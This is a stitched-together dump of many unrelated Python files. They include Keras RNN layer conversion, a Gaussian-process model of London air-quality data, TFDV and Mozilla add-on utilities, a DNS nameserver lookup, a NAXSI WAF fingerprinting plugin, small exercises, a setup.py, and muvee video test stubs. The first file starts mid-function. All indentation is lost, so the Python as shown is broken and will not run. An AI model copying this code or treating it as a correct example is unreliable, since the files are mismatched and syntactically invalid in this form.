Returns
-------
Layer object
'''
if model_type == 'RNN':
# check for the use of CUDNN RNN layers
# these layers must be mapped to non-CUDNN layer
# format
if layer.__class__.__name__ == 'Bidirectional':
tlayer = layer.forward_layer
config = tlayer.get_config()
if tlayer.__class__.__name__ == 'CuDNNLSTM':
new_layer = Bidirectional(LSTM(config['units'],
return_sequences=config['return_sequences'],
return_state=False,
unit_forget_bias=config['unit_forget_bias'],
stateful=False,
activation='tanh',
recurrent_activation='sigmoid'), merge_mode='concat')
elif tlayer.__class__.__name__ == 'CuDNNGRU':
new_layer = Bidirectional(GRU(config['units'],
return_sequences=config['return_sequences'],
return_state=False,
stateful=False,
reset_after=True), merge_mode='concat')
else:
new_layer = layer
else:
tlayer = layer
config = tlayer.get_config()
if tlayer.__class__.__name__ == 'CuDNNLSTM':
new_layer = LSTM(config['units'],
return_sequences=config['return_sequences'],
return_state=False,
unit_forget_bias=config['unit_forget_bias'],
stateful=False,
activation='tanh',
recurrent_activation='sigmoid')
elif tlayer.__class__.__name__ == 'CuDNNGRU':
new_layer = GRU(config['units'],
return_sequences=config['return_sequences'],
return_state=False,
stateful=False,
reset_after=True)
else:
new_layer = layer
else:
new_layer = layer
return new_layer
|
from . import dcosauth
from . import dcosawsstack
from . import dcosawssg
from . import dcosdnsalias
|
import bayesnewton
import objax
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import pandas as pd
from sklearn.preprocessing import StandardScaler
from convertbng.util import convert_bng
import time
def datetime_to_epoch(datetime):
"""
Converts a datetime to a number
args:
datatime: is a pandas column
"""
return datetime.astype('int64') // 1e9
species = 'pm10'
raw_data = pd.read_csv('../data/aq_data.csv')
sites_df = pd.read_csv('../data/laqn_sites.csv', sep=';')
# filter sites not in london
london_box = [
[51.279, 51.684], # lat
[-0.533, 0.208] # lon
]
sites_df = sites_df[(sites_df['Latitude'] > london_box[0][0]) & (sites_df['Latitude'] < london_box[0][1])]
sites_df = sites_df[(sites_df['Longitude'] > london_box[1][0]) & (sites_df['Longitude'] < london_box[1][1])]
# merge spatial infomation to data
raw_data = raw_data.merge(sites_df, left_on='site', right_on='SiteCode')
# convert to datetimes
raw_data['date'] = pd.to_datetime(raw_data['date'])
raw_data['epoch'] = datetime_to_epoch(raw_data['date'])
# get data in date range
data_range_start = '2019/02/18 00:00:00'
data_range_end = '2019/02/25 23:59:59' # '2019/03/11 23:59:59', '2019/02/25 23:59:59', '2019/04/17 23:59:59'
raw_data = raw_data[(raw_data['date'] >= data_range_start) & (raw_data['date'] < data_range_end)]
X = np.array(raw_data[['epoch', 'Longitude', 'Latitude']])
Y = np.array(raw_data[[species]])
# convert to easting and northings
british_national_grid_coords = convert_bng(X[:, 1], X[:, 2])
X = np.vstack([X[:, 0],
np.array(british_national_grid_coords[0]),
np.array(british_national_grid_coords[1])]).T
# normalise
# X = (X - np.mean(X, axis=0)) / np.std(X, axis=0)
# Y = (Y - np.nanmean(Y, axis=0)) / np.nanstd(Y, axis=0)
# standardise
# X_scaler = StandardScaler().fit(X)
R_scaler = StandardScaler().fit(X[:, 1:])
Y_scaler = StandardScaler().fit(Y)
# X = X_scaler.transform(X)
X[:, 1:] = R_scaler.transform(X[:, 1:])
X[:, 0] = (X[:, 0] - min(X[:, 0])) / (60 * 60) # convert from seconds to hours
Y = Y_scaler.transform(Y)
grid = True
print(Y.shape)
print("num data points =", Y.shape[0])
test_ind = np.random.permutation(X.shape[0])[:X.shape[0]//10]
t_test = X[test_ind, :1]
R_test = X[test_ind, 1:]
Y_test = Y[test_ind, :]
if grid:
# the gridded approach:
t, R, Y = bayesnewton.utils.create_spatiotemporal_grid(X, Y)
else:
# the sequential approach:
t = X[:, :1]
R = X[:, 1:]
Nt = t.shape[0]
print("num time steps =", Nt)
N = Y.shape[0] * Y.shape[1] * Y.shape[2]
print("num data points =", N)
# ttest = np.unique(X[:, 0])[:, None]
N_test = 20 # 50
# r1 = np.unique(X[:, 1])
# r2 = np.unique(X[:, 2])
X1range = max(X[:, 1]) - min(X[:, 1])
X2range = max(X[:, 2]) - min(X[:, 2])
r1 = np.linspace(min(X[:, 1]) - 0.1 * X1range, max(X[:, 1]) + 0.1 * X1range, num=N_test)
r2 = np.linspace(min(X[:, 2]) - 0.05 * X2range, max(X[:, 2]) + 0.05 * X2range, num=N_test)
rA, rB = np.meshgrid(r1, r2)
r = np.hstack((rA.reshape(-1, 1), rB.reshape(-1, 1))) # Flattening grid for use in kernel functions
Rplot = np.tile(r, [t.shape[0], 1, 1])
var_y = 1.
var_f = 1.
len_time = 5 # step size = 1 (hour)
len_space = 1 # spatial inputs normalised to around [-3, 3]
sparse = True
opt_z = True # will be set to False if sparse=False
if sparse:
z1 = np.linspace(np.min(X[:, 1]), np.max(X[:, 1]), num=7)
z2 = np.linspace(np.min(X[:, 2]), np.max(X[:, 2]), num=7)
zA, zB = np.meshgrid(z1, z2) # Adding additional dimension to inducing points grid
z = np.hstack((zA.reshape(-1, 1), zB.reshape(-1, 1))) # Flattening grid for use in kernel functions
del z1, z2, zA, zB
else:
z = R[0, ...]
del raw_data, X, rA, rB, r, sites_df
# kern = bayesnewton.kernels.SpatioTemporalMatern52(variance=var_f,
# lengthscale_time=len_time,
# lengthscale_space=[len_space, len_space],
# z=z,
# sparse=sparse,
# opt_z=opt_z,
# conditional='Full')
kern_time = bayesnewton.kernels.Matern32(variance=var_f, lengthscale=len_time)
kern_space0 = bayesnewton.kernels.Matern32(variance=var_f, lengthscale=len_space)
kern_space1 = bayesnewton.kernels.Matern32(variance=var_f, lengthscale=len_space)
kern_space = bayesnewton.kernels.Separable([kern_space0, kern_space1])
kern = bayesnewton.kernels.SpatioTemporalKernel(temporal_kernel=kern_time,
spatial_kernel=kern_space,
z=z,
sparse=sparse,
opt_z=opt_z,
conditional='Full')
lik = bayesnewton.likelihoods.Gaussian(variance=var_y)
# model = bayesnewton.models.VariationalGP(kernel=kern, likelihood=lik, X=X, Y=y)
model = bayesnewton.models.MarkovVariationalGP(kernel=kern, likelihood=lik, X=t, R=R, Y=Y)
# model = bayesnewton.models.InfiniteHorizonVariationalGP(kernel=kern, likelihood=lik, X=t, R=R, Y=Y)
# model = bayesnewton.models.MarkovVariationalGPMeanField(kernel=kern, likelihood=lik, X=t, R=R, Y=Y)
# Mt = 700 # num inducing points in time
# batch_size = Nt
# Z = np.linspace(np.min(t), np.max(t), Mt)[:, None]
# model = bayesnewton.models.SparseMarkovVariationalGP(kernel=kern, likelihood=lik, X=t, R=R, Y=Y, Z=Z)
lr_adam = 0.05
lr_newton = 0.5
iters = 20
opt_hypers = objax.optimizer.Adam(model.vars())
energy = objax.GradValues(model.energy, model.vars())
@objax.Function.with_vars(model.vars() + opt_hypers.vars())
def train_op():
model.inference(lr=lr_newton) # perform inference and update variational params
dE, E = energy() # compute energy and its gradients w.r.t. hypers
opt_hypers(lr_adam, dE)
return E
train_op = objax.Jit(train_op)
t0 = time.time()
for i in range(1, iters + 1):
loss = train_op()
print('iter %2d, energy: %1.4f' % (i, loss[0]))
t1 = time.time()
print('optimisation time: %2.2f secs' % (t1-t0))
# calculate posterior predictive distribution via filtering and smoothing at train & test locations:
print('calculating the posterior predictive distribution ...')
t0 = time.time()
posterior_mean, posterior_var = model.predict(X=t, R=Rplot)
nlpd = model.negative_log_predictive_density(X=t_test, R=R_test, Y=Y_test)
t1 = time.time()
print('prediction time: %2.2f secs' % (t1-t0))
print('nlpd: %2.3f' % nlpd)
z_opt = model.kernel.z.value
mu = bayesnewton.utils.transpose(posterior_mean.reshape(-1, N_test, N_test))
mu = Y_scaler.inverse_transform(mu)
Y = Y_scaler.inverse_transform(Y)
save_result = False
# if save_result:
# with open("output_mu.txt", "wb") as fp:
# pickle.dump(mu, fp)
del model, kern, Rplot # , var
print('plotting ...')
cmap = cm.viridis
vmin = np.nanpercentile(Y, 1)
vmax = np.nanpercentile(Y, 99)
for time_step in range(t.shape[0]):
print(time_step)
f, (a0, a1) = plt.subplots(2, 1, gridspec_kw={'height_ratios': [20, 1]})
f.set_figheight(8)
# f.set_figwidth(8)
im = a0.imshow(mu[time_step].T, cmap=cmap, vmin=vmin, vmax=vmax,
extent=[r1[0], r1[-1], r2[0], r2[-1]], origin='lower')
a0.scatter(R[time_step, :, 0], R[time_step, :, 1], cmap=cmap, vmin=vmin, vmax=vmax,
c=np.squeeze(Y[time_step]), s=50, edgecolors='black')
plt.colorbar(im, fraction=0.0348, pad=0.03, aspect=30, ax=a0)
if sparse:
a0.scatter(z_opt[:, 0], z_opt[:, 1], c='r', s=20, alpha=0.5) # plot inducing inputs
a0.set_xlim(r1[0], r1[-1])
a0.set_ylim(r2[0], r2[-1])
a0.set_xticks([], [])
a0.set_yticks([], [])
a0.set_title(species)
# a0.set_ylabel('Latitude')
# a0.set_xlabel('Longitude')
a0.set_xlabel('Easting')
a0.set_ylabel('Northing')
a1.vlines(t[time_step] / 24, -1, 1, 'r')
a1.set_xlabel('time (days)')
a1.set_yticks([], [])
a1.set_xlim(t[0] / 24, t[-1] / 24)
# a1.set_xticks([0, 7, 14, 21])
f.savefig('output/output_%04d.png' % time_step)
plt.close(f)
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Decode TF Examples into in-memory representation for tf data validation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import apache_beam as beam
from tensorflow_data_validation import types
from tensorflow_data_validation.pywrap import pywrap_tensorflow_data_validation
DecodeExample = pywrap_tensorflow_data_validation.TFDV_DecodeExample # pylint: disable=invalid-name
# TODO(pachristopher): This fast coder can also benefit TFT. Consider moving
# this coder to tf.Beam once it is available.
class TFExampleDecoder(object):
"""A decoder for decoding TF examples into tf data validation datasets.
"""
def decode(self, serialized_example_proto):
"""Decodes serialized tf.Example to tf data validation input dict."""
return DecodeExample(serialized_example_proto)
@beam.ptransform_fn
@beam.typehints.with_input_types(bytes)
@beam.typehints.with_output_types(types.BeamExample)
def DecodeTFExample(examples
): # pylint: disable=invalid-name
"""Decodes serialized TF examples into an in-memory dict representation.
Args:
examples: A PCollection of strings representing serialized TF examples.
Returns:
A PCollection of dicts representing the TF examples.
"""
decoder = TFExampleDecoder()
return examples | 'ParseTFExamples' >> beam.Map(decoder.decode)
|
import os
import subprocess
import tempfile
from base64 import b64encode
from django.conf import settings
from django.utils.encoding import force_text
import six
from PIL import Image
import olympia.core.logger
from olympia.lib.safe_xml import lxml
log = olympia.core.logger.getLogger('z.versions.utils')
def write_svg_to_png(svg_content, out):
# when settings.DEBUG is on (i.e. locally) don't delete the svgs.
tmp_args = {
'dir': settings.TMP_PATH, 'mode': 'wb', 'suffix': '.svg',
'delete': not settings.DEBUG}
with tempfile.NamedTemporaryFile(**tmp_args) as temporary_svg:
temporary_svg.write(svg_content)
temporary_svg.flush()
try:
if not os.path.exists(os.path.dirname(out)):
os.makedirs(os.path.dirname(out))
command = [
settings.RSVG_CONVERT_BIN,
'--output', out,
temporary_svg.name,
]
subprocess.check_call(command)
except IOError as io_error:
log.debug(io_error)
return False
except subprocess.CalledProcessError as process_error:
log.debug(process_error)
return False
return True
def encode_header(header_blob, file_ext):
try:
if file_ext == '.svg':
tree = lxml.etree.fromstring(header_blob)
width = int(tree.get('width'))
height = int(tree.get('height'))
img_format = 'svg+xml'
else:
with Image.open(six.BytesIO(header_blob)) as header_image:
(width, height) = header_image.size
img_format = header_image.format.lower()
src = 'data:image/%s;base64,%s' % (
img_format, force_text(b64encode(header_blob)))
except (IOError, ValueError, TypeError, lxml.etree.XMLSyntaxError) as err:
log.debug(err)
return (None, 0, 0)
return (src, width, height)
class AdditionalBackground(object):
@classmethod
def split_alignment(cls, alignment):
alignments = alignment.split()
# e.g. "center top"
if len(alignments) >= 2:
return (alignments[0], alignments[1])
elif len(alignments) == 1:
# e.g. "left", which is the same as 'left center'
if alignments[0] in ['left', 'right']:
return (alignments[0], 'center')
# e.g. "top", which is the same as 'center top'
else:
return ('center', alignments[0])
else:
return ('', '')
def __init__(self, path, alignment, tiling, background):
# If there an unequal number of alignments or tiling to srcs the value
# will be None so use defaults.
self.alignment = (alignment or 'right top').lower()
self.tiling = (tiling or 'no-repeat').lower()
file_ext = os.path.splitext(path)[1]
self.src, self.width, self.height = encode_header(background, file_ext)
def calculate_pattern_offsets(self, svg_width, svg_height):
align_x, align_y = self.split_alignment(self.alignment)
if align_x == 'right':
self.pattern_x = svg_width - self.width
elif align_x == 'center':
self.pattern_x = (svg_width - self.width) // 2
else:
self.pattern_x = 0
if align_y == 'bottom':
self.pattern_y = svg_height - self.height
elif align_y == 'center':
self.pattern_y = (svg_height - self.height) // 2
else:
self.pattern_y = 0
if self.tiling in ['repeat', 'repeat-x'] or self.width > svg_width:
self.pattern_width = self.width
else:
self.pattern_width = svg_width
if self.tiling in ['repeat', 'repeat-y'] or self.height > svg_height:
self.pattern_height = self.height
else:
self.pattern_height = svg_height
CHROME_COLOR_TO_CSS = {
'bookmark_text': 'toolbar_text',
'frame': 'accentcolor',
'frame_inactive': 'accentcolor',
'tab_background_text': 'textcolor',
}
def process_color_value(prop, value):
prop = CHROME_COLOR_TO_CSS.get(prop, prop)
if isinstance(value, list) and len(value) == 3:
return prop, u'rgb(%s,%s,%s)' % tuple(value)
# strip out spaces because jquery.minicolors chokes on them
return prop, six.text_type(value).replace(' ', '')
|
n = int(input("Enter n: "))
x = int(input("Enter x: "))
power = 0
z = 0
st = ""
while n >= 1:
while x**power <= n:
power += 1
z = power - 1
n = n - x**z
st = "+" + str(x) + "^" + str(z) + st
power = 0
print(st)
|
# Binary Tree Level Order Traversal - Breadth First Search 1
# Given the root of a binary tree, return the level order traversal of its nodes' values. (i.e., from left to right, level by level).
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def levelOrder(self, root):
if not root:
return []
levels = []
new_level = []
new_level.append(root)
while (len(new_level) != 0):
cur_level = list(new_level) # copy
cur_level_values = []
new_level.clear()
for node in cur_level:
cur_level_values.append(node.val)
if (node.left):
new_level.append(node.left)
if (node.right):
new_level.append(node.right)
levels.append(cur_level_values)
return levels
# Time Complexity: O(N)
# Space Complexity: O(N)
|
from dns.resolver import Resolver, query, NXDOMAIN
import dns.query
from dns.exception import Timeout
from dns.message import make_query
from dns.rdatatype import NS
import socket
from random import choice
def get_zone_nameservers(zone):
nss = []
for answer in query(zone, 'NS'):
nss.append(socket.gethostbyname(answer.to_text()))
return nss
def names_to_nameservers(names):
zone_nss = {}
for name in names:
domain, zone = name.split('.', 1)
if zone not in zone_nss:
zone_nss[zone] = get_zone_nameservers(zone + '.')
msg = make_query(name + '.', NS)
ns = choice(zone_nss[zone])
response = dns.query.udp(msg, ns)
yield (name, tuple(sorted(rr.target.to_text() for rr in response.authority[0] if rr.rdtype == NS)))
with open('domains.txt', 'r') as fh:
for host, nss in names_to_nameservers(line.rstrip() for line in fh):
if nss == ():
ns = "NONE"
else:
ns = "\n\t".join(nss)
print host + "\n\t" + ns + "\n" |
# -*- coding: utf-8 -*-
import uuid
URL_TEMPLATE = "{scheme}://{domain}/{path}"
def get_uuid_from_query_params(request, param):
"""
return uuid from a given queryset after parsing it.
"""
param_field = request.query_params.get(param, None)
if param_field:
try:
return uuid.UUID(param_field)
except ValueError:
return None
return None
|
#!/usr/bin/env python
NAME = 'NAXSI (NBS Systems)'
def is_waf(self):
# Sometimes naxsi waf returns 'x-data-origin: naxsi/waf'
if self.matchheader(('X-Data-Origin', r'^naxsi(.*)?')):
return True
# Found samples returning 'server: naxsi/2.0'
if self.matchheader(('server', r'naxsi(.*)?')):
return True
for attack in self.attacks:
r = attack(self)
if r is None:
return
_, responsebody = r
if any(i in responsebody for i in (b'Blocked By NAXSI', b'Naxsi Blocked Information')):
return True
return False |
from justgood import imjustgood
api = imjustgood("YOUR_APIKEY_HERE")
data = api.youtubedl("https://youtu.be/kJQP7kiw5Fk")
print(data)
# EXAMPLE GET CERTAIN ATTRIBUTES
result = "Title : {}".format(data["result"]["title"])
result += "\nAuthor : {}".format(data["result"]["author"])
result += "\nDuration : {}".format(data["result"]["duration"])
result += "\nWatched : {}".format(data["result"]["watched"])
result += "\n\nThumbnail :\n{}".format(data["result"]["thumbnail"])
result += "\n\nAudio :\n{}".format(data["result"]["audioUrl"])
result += "\n\nVideo :\n{}".format(data["result"]["videoUrl"])
result += "\n\nPage : {}".format(data["result"]["pageUrl"])
print(result)
|
from datadog_custom_logger.handler import DatadogCustomLogHandler
import logging |
import falcon
import json
class Home:
def on_get(self, req, res):
hello = {
'hello': 'world'
}
res.data = json.dumps(hello).encode('utf-8')
res.status = falcon.HTTP_200
|
import codecs
import re
import os
import sys
try:
from setuptools import setup
except:
print('please install setuptools via pip:')
print(' <pip_exe> install setuptools')
sys.exit(-1)
def find_version(*file_paths):
version_file = codecs.open(os.path.join(os.path.abspath(
os.path.dirname(__file__)), *file_paths), 'r').read()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name='paramgmt',
version=find_version('paramgmt', '__init__.py'),
description='Parallel SSH machine management',
author='Nic McDonald',
author_email='nicci02@hotmail.com',
license='Apache License Version 2.0',
url='http://github.com/google/paramgmt',
packages=['paramgmt'],
scripts=['bin/rhosts', 'bin/lcmd', 'bin/rcmd',
'bin/rpull', 'bin/rpush', 'bin/rscript'],
install_requires=['termcolor >= 1.1.0'],
)
|
"""
All function stubs that make up a muFAT run are implemented here. Essentially,
a 'stub' is any function that when called once inside a run performs any number
of tasks, while hiding the underlying nitty gritty details of mucking about with
muvee's COM interfaces.
All of these function stubs will be imported into the 'muvee.*' module namespace.
Example stubs:
- muvee.Init
- muvee.Release
- muvee.AddSourceImage
"""
import inspect, os, re, sys, threading, time
from functools import wraps
from xml.etree import ElementTree as etree
from . import gen_stub, ArType, InitFlags, LoadFlags, MakeFlags, SourceType, \
TimelineType, IMVExclude, IMVHighlight, IMVImageInfo, IMVOperatorInfo, \
IMVPrimaryCaption, IMVSource, IMVSource2, IMVStyleCollection, IMVStyleEx, \
IMVSupportMultiCaptions, IMVTargetRect, IMVTitleCredits
from .testing import detect_media, generate_test, normalize
from .window import Window
def is_a_stub(f):
"""
Marks the function as a test stub, so that `muvee.testing.MufatTestRunner`
can discover and wrap the function as a `unittest.FunctionTestCase`.
Alternatively, when a testcase is run by `muvee.testing.run`, any functions
decorated by '@is_a_stub' will be dynamically wrapped as a
`unittest.FunctionTestCase` before being executed as part of an ongoing
test suite.
"""
@wraps(f)
def _wrap(*args, **kwargs):
return generate_test(f, *args, **kwargs)
setattr(_wrap, "is_a_stub", True)
return _wrap
def is_true_or_non_zero(ret):
return ret == None or ret == True or \
(type(ret) in [ int, float ] and ret >= 0)
@is_a_stub
def Init(flags=InitFlags.DEFAULT):
"""Initializes MVRuntime.MVCore"""
from .mvrt import Core
Core.Init(flags)
@is_a_stub
def Release():
"""Releases the COM reference to MVRuntime"""
from . import mvrt
mvrt.Release()
def AddSource(src, srctype=SourceType.UNKNOWN, loadtype=LoadFlags.VERIFYSUPPORT):
from .mvrt import Core
# guess type from source object
if srctype == SourceType.UNKNOWN:
srctype = int(src.Type)
assert Core.AddSource(srctype, src, loadtype), \
'AddSource failed: ' + GetLastErrorDescription()
def CreateSource(path, srctype):
"""
Creates and returns an IMVSource object for the given file and source type.
:param path: Path to the source file
:param srctype: `muvee.SourceType` enumeration
"""
from .mvrt import Core
src = Core.CreateMVSource(srctype)
if srctype in [ SourceType.IMAGE, SourceType.MUSIC, SourceType.VIDEO ]:
path = normalize(path)
assert os.path.exists(path), "File %s does not exist" % path
assert src.LoadFile(path, LoadFlags.VERIFYSUPPORT), \
'LoadFile failed: ' + GetLastErrorDescription()
elif srctype == SourceType.OPERATOR:
assert os.path.exists(path), "File %s does not exist" % path
assert src.LoadFile(path, LoadFlags.NULL), \
'LoadFile failed: ' + GetLastErrorDescription()
else:
# not a file source type
src2 = gen_stub(IMVSource2)(src)
src2.Load(path, int(LoadFlags.CONTEXT))
return src
@is_a_stub
def EnumAndSetMVStyle(sty):
from .mvrt import Core
styname = Core.Styles.EnumMVStyleByMod(sty)
Core.SetActiveMVStyle(styname)
@is_a_stub
def AddSourceImage(path):
src = CreateSource(path, SourceType.IMAGE)
AddSource(src, SourceType.IMAGE, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceImageWithCaption(path, caption):
from . import IMVCaptionCollection
src = CreateSource(path, SourceType.IMAGE)
if hasattr(src, 'Captions'):
supports = src.Captions
else:
supports = gen_stub(IMVSupportMultiCaptions)(src).Captions
captions = IMVCaptionCollection(supports)
assert captions.AddCaption(caption) is not None, \
'AddCaption failed: ' + GetLastErrorDescription()
assert len(captions) > 0
assert captions.VerifyUserDscrp(), \
'VerifyUserDscrp failed: ' + GetLastErrorDescription()
AddSource(src, SourceType.IMAGE, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceImageWithMagicSpot(path, *args):
src = CreateSource(path, SourceType.IMAGE)
# cast IMVSource to IMVTargetRect
rect = gen_stub(IMVTargetRect)(src)
# add magic spots from variable arguments in 4-pairs
for i in xrange(0, len(args), 4):
coords = args[i:i+4]
assert len(coords) == 4
rect.AddTargetRect(*coords)
AddSource(src, SourceType.IMAGE, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceMusic(path):
src = CreateSource(path, SourceType.MUSIC)
AddSource(src, SourceType.MUSIC, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceMusicClip(path, start, stop):
src = CreateSource(path, SourceType.MUSIC)
src.Start = start
src.Stop = stop
AddSource(src, SourceType.MUSIC, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceTextWithMinDuration(text, duration):
src = CreateSource(text, SourceType.TEXT)
src.MinImgSegDuration = duration
AddSource(src, SourceType.TEXT, LoadFlags.CONTEXT)
@is_a_stub
def AddSourceVideo(path):
src = CreateSource(path, SourceType.VIDEO)
AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceVideoNoProxy(path):
from .mvrt import Core
src = Core.CreateMVSource(SourceType.VIDEO)
path = normalize(path)
assert os.path.exists(path), "File %s does not exist" % path
assert src.LoadFile(path, int(LoadFlags.VERIFYSUPPORT)|int(LoadFlags.DISABLE_LOREZPROXY)), \
'LoadFile failed: ' + GetLastErrorDescription()
AddSource(src, SourceType.VIDEO, int(LoadFlags.VERIFYSUPPORT)|int(LoadFlags.DISABLE_LOREZPROXY))
@is_a_stub
def AddSourceVideoWithCapHL(path, caption, start, end):
src = CreateSource(path, SourceType.VIDEO)
# cast IMVSource to IMVCaptionHighlight
from . import IMVCaptionHighlight
hilite = gen_stub(IMVCaptionHighlight)(src)
hilite.SetCaptionHighlight(caption, start, end, None)
hilite.VerifyUserDescriptors()
AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceVideoWithMagicMoments(path, *args):
src = CreateSource(path, SourceType.VIDEO)
# cast IMVSource to IMVHighlight
hilite = gen_stub(IMVHighlight)(src)
# add highlights from variable arguments in tuple pairs
for i in xrange(0, len(args), 2):
pair = args[i:i+2]
assert len(pair) == 2
hilite.SetHighlight(*pair)
# test if highlights were set correctly
hilite.VerifyUserDescriptors()
AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceVideoWithExclusion(path, *args):
src = CreateSource(path, SourceType.VIDEO)
# cast IMVSource to IMVExclude
exclude = gen_stub(IMVExclude)(src)
# add exclusions from variable arguments in tuple pairs
for i in xrange(0, len(args), 2):
pair = args[i:i+2]
assert len(pair) == 2
exclude.SetExclusion(*pair)
# test if exclusions were set correctly
exclude.VerifyUserDescriptors()
AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
@is_a_stub
def AddSourceAnchorOperator(scmfile, music_idx, anchor_value):
from .mvrt import Core
assert Core.MusicSources.Count > music_idx, "Music index out-of-range!"
music = Core.MusicSources[music_idx]
src = CreateSource(scmfile, SourceType.OPERATOR)
# setup anchor parameters
op = gen_stub(IMVOperatorInfo)(src)
op.SetParam("ANCHOR_MEDIA", music.UniqueID)
op.SetParam("ANCHOR_TIME", anchor_value)
AddSource(src, SourceType.OPERATOR, LoadFlags.NULL)
@is_a_stub
def AddCopyright(message, color=None, x=None, y=None, width=None, height=None):
from .mvrt import Core
# set copyright message
primary = gen_stub(IMVPrimaryCaption)(Core)
primary.PrimaryCaption.Text = message
fmt = primary.PrimaryCaption.TextDisplayFormat
# set formatting
if color is not None:
fmt.BackgroundColor = color
if x is not None:
fmt.TextRectXCoord = x
if y is not None:
fmt.TextRectYCoord = y
if width is not None:
fmt.TextRectWidth = width
if height is not None:
fmt.TextRectHeight = height
primary.PrimaryCaption.TextDisplayFormat = fmt
@is_a_stub
def AddLogo(path, placement=None, opacity=None, crop=None):
from . import IMVProductionOverlay
from .mvrt import Core
# set logo
overlay = gen_stub(IMVProductionOverlay)(Core)
path = normalize(path)
assert os.path.isfile(path)
overlay.OverlaySourceFile = path
if placement is not None and len(placement) == 4:
assert all(type(arg) in [float, int] for arg in placement), "Arguments must be floats"
overlay.SetOverlayPlacement(*placement)
if opacity is not None:
assert type(opacity) in [float, int]
overlay.OverlayOpacity = opacity
if crop is not None:
assert all(type(arg) in [float, int] for arg in crop), "Arguments must be floats"
overlay.SetOverlayCropRect(*crop)
@is_a_stub
def ConfigRenderTL2File(path):
from .mvrt import Core
# check if file exists
path = normalize(path)
assert os.path.isfile(path) and os.path.splitext(path)[1] == '.bin'
Core.ConfigRenderTL2File(path)
def GetLastErrorDescription():
from .mvrt import Core
return Core.GetLastErrorDescription()
@is_a_stub
def SetActiveMVStyle(style, check=False):
"""
Sets the current Muvee Style to `style`
:param style: A string containing the name of the style, or a number representing
the n-th index in the styles list
:param check: Whether to validate if the given parameter is in the list of
available styles first.
"""
from .mvrt import Core
if check:
assert Core.Styles.Count > 0, "No styles found!"
# check if style name is valid
assert style in map(lambda s: s.InternalName, IMVStyleCollection(Core.Styles))
if hasattr(Core, "ActiveMVStyle"):
Core.ActiveMVStyle = style
else:
Core.SetActiveMVStyle(style)
@is_a_stub
def PutCreditsString(credits):
from .mvrt import Core
# cast IMVStyleCollection to IMVTitleCredits
tc = gen_stub(IMVTitleCredits)(Core.Styles)
tc.CreditsString = credits
@is_a_stub
def PutTitleString(title):
from .mvrt import Core
# cast IMVStyleCollection to IMVTitleCredits
titles = gen_stub(IMVTitleCredits)(Core.Styles)
titles.TitleString = title
@is_a_stub
def PutAspectRatio(ratio):
from .mvrt import Core
assert ratio in ArType.__dict__.values()
Core.AspectRatio = ratio
@is_a_stub
def PutDescriptorFolder(path):
from .mvrt import Core
path = normalize(path)
if not os.path.exists(path):
os.makedirs(path)
Core.DescriptorFolder = path
@is_a_stub
def PutSyncSoundLevel(level):
from .mvrt import Core
assert 0 <= level <= 1
Core.SyncSoundLevel = level
@is_a_stub
def PutMusicLevel(level):
from .mvrt import Core
assert 0 <= level <= 1
Core.MusicLevel = level
def CheckProgress(poll_func, poll_flag=None, timeout=3600, sleep=1, onStop=None):
"""
Runs a while loop to check a task's running progress until it completes,
times out, or stalls from inactivity.
:param poll_func: Function callback to use to fetch the current progress.
Must return a number.
:param poll_flag: `threading.Event` flag object to signal if a poll function
should not be executed anymore (e.g. caller function has stopped a process)
:param timeout: How many seconds before the polled task is considered to
have timed out and may be cancelled. Default: 60 minutes.
:param sleep: How many seconds to wait in between polls. Default: 1 second.
:param onStop: Function to call when the loop has indicated that the task
is complete, or has timed out, or has failed due to an exception.
"""
last_prog = prog = -1
last_changed = time.time()
count = timeout
try:
while prog < 1.0:
if poll_flag is not None and poll_flag.isSet():
print "Stopping...",
break
# fetch current progress from function
prog = poll_func.__call__()
print r"Progress: %.2f" % prog
if prog <= 0.0 or (prog - last_prog) < 0.01:
# check if progress was stuck in the last 5 minutes
assert time.time() - last_changed < 300, \
("Progress stuck at %.2f%% for over 5 minutes!" % prog)
else:
last_prog = prog
last_changed = time.time()
count -= 1
assert count >= 0, "Timed out after %d repetitions." % timeout
time.sleep(sleep)
except KeyboardInterrupt:
pass
finally:
# cleanup and call teardown function
print "done."
if onStop is not None:
onStop.__call__()
def StartCheckProgress(poll_func, poll_flag=None, timeout=3600, sleep=1, onStop=None):
"""
Same as `CheckProgress`, but starts another thread to run it asynchronously.
"""
threading.Thread(target=CheckProgress, \
args=(poll_func, poll_flag, timeout, sleep, onStop)).start()
@is_a_stub
def AnalyseTillDone(resolution=1000, timeout=1800):
"""
Starts analyzing all added sources in a separate thread and polls its
progress until analysis is done. The function will timeout after
`resolution` x `timeout` milliseconds.
:param resolution: Frequency to poll for progress updates in milliseconds.
Default: 1000 milliseconds.
:param timeout: How many polls until the function is considered timed out.
Default: 1800 polls.
"""
from .mvrt import Core
assert is_true_or_non_zero(Core.StartAnalysisProc(0)), \
("StartAnalysisProc failed: ", GetLastErrorDescription())
CheckProgress(lambda: Core.GetAnalysisProgress(), timeout=timeout,
sleep=resolution/1000.0, onStop=lambda: Core.StopAnalysisProc())
@is_a_stub
def MakeTillDone(mode, duration):
"""
Calls `IMVCore.MakeMuveeTimeline` and blocks until making is done.
:param mode: `muvee.MakeFlags` enum
:param duration: Duration of muvee in seconds
"""
